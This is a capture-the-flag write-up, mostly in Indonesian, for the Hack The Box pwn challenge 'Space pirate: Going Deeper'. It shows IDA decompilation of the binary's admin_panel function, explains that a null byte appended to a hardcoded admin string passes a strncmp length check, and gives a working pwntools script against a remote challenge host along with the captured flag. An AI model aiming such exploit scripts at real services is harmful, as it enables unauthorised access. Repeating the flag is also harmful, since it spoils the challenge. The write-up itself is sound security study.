Skip to content

Space pirate: Going Deeper

$ file sp_going_deeper
sp_going_deeper: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./glibc/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=9f094957db0c2401b2ba895893f94941d618463e, not stripped

ld-linux-x86-64.so.2
libc.so.6

HTB{f4k3_fl4g_4_t35t1ng}

Menggunakan tools decompiler, salah satunya IDA

melihat detail fungsi admin_panel

int __fastcall admin_panel(__int64 a1, __int64 a2, __int64 a3)
{
  __int64 v4; // [rsp+8h] [rbp-48h]
  char buf; // [rsp+20h] [rbp-30h]
  __int64 v6; // [rsp+48h] [rbp-8h]

  v4 = a3;
  v6 = 0LL;
  printf(
    "[*] Safety mechanisms are enabled!\n"
    "[*] Values are set to: a = [%x], b = [%ld], c = [%ld].\n"
    "[*] If you want to continue, disable the mechanism or login as admin.\n",
    a1,
    a2,
    a3);
  while ( v6 != 1 && v6 != 2 && v6 != 3 )
  {
    printf(a1DisableMechan);
    v6 = read_num();
  }
  if ( v6 == 1 )
  {
    printf("\n[*] Input: ");
  }
  else
  {
    if ( v6 != 2 )
    {
      puts("\n[!] Exiting..\n");
      exit(6969);
    }
    printf("\n[*] Username: ");
  }
  read(0, &buf, 0x39uLL);
  if ( a1 == 3735928559LL && a2 == 322420958 && v4 == 322420463
    || !strncmp("DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft", &buf, 0x34uLL) )
  {
    printf("\n%s[+] Welcome admin! The secret message is: ", "\x1B[1;32m");
    system("cat flag*");
  }
  else
  {
    printf("\n%s[-] Authentication failed!\n", "\x1B[1;31m");
  }
  return puts("\n[!] For security reasons, you are logged out..\n");
}

input user akan dicompare dengan DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft len() = 51, sedangkan panjang strncmp 0x34 (52)

strncmp("DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft", &buf, 0x34uLL)

maka perlu ditambah dengan null bytes, sehingga diperoleh flag

flag.py
from pwn import *

url = "68.183.37.6"
port = 30286

# target = process("./sp_going_deeper")

target = remote(url, port)
print(target.recv())

opsi = '1'
print(opsi)
target.sendline(opsi)
print(target.recv())

inpt = b'DRAEGER15th30n34nd0nly4dm1n15tr4t0R0fth15sp4c3cr4ft\00'
print(inpt)
target.sendline(inpt)
print(target.recv())

flag HTB{n0_n33d_2_ch4ng3_m3ch5_wh3n_u_h4v3_fl0w_r3d1r3ct}

Referensi/Solusi lain

  1. https://heinandre.no/htb-cyber-apocalypse-2022/pwn/space-pirate-going-deeper